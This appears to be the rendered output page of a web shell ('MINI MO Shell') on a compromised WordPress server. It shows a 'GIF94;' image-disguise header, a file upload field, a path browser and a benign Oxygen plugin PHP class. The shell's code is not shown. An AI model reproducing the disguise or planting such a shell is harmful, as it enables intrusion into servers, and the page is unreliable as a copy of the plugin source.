GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/loop-controller.php

<?php

namespace Breakdance\DynamicData;

class LoopController  {

    /** @var self[] */
    public static $instances = [];

    /**
     * @var mixed
     */
    public $field = [];

    /**
     * @param string $id
     * @return self
     */
    public static function getInstance($id = 'default'): self
    {
        if (!array_key_exists($id, self::$instances)) {
            self::$instances[$id] = new self();
        }

        return self::$instances[$id];
    }

    // Prevent cloning of the instance
    public function __clone()
    {
    }

    // Prevent deserialization of the instance
    public function __wakeup()
    {
    }

    /**
     * @param mixed $field
     * @return void
     */
    public function set($field)
    {
        $this->field = $field;
    }

    /**
     * @return mixed
     */
    public function get()
    {
        return $this->field;
    }

    public function reset()
    {
        $this->field = [];
    }
}

OHA YOOO - Tarih: 2026-08-03 23:13:59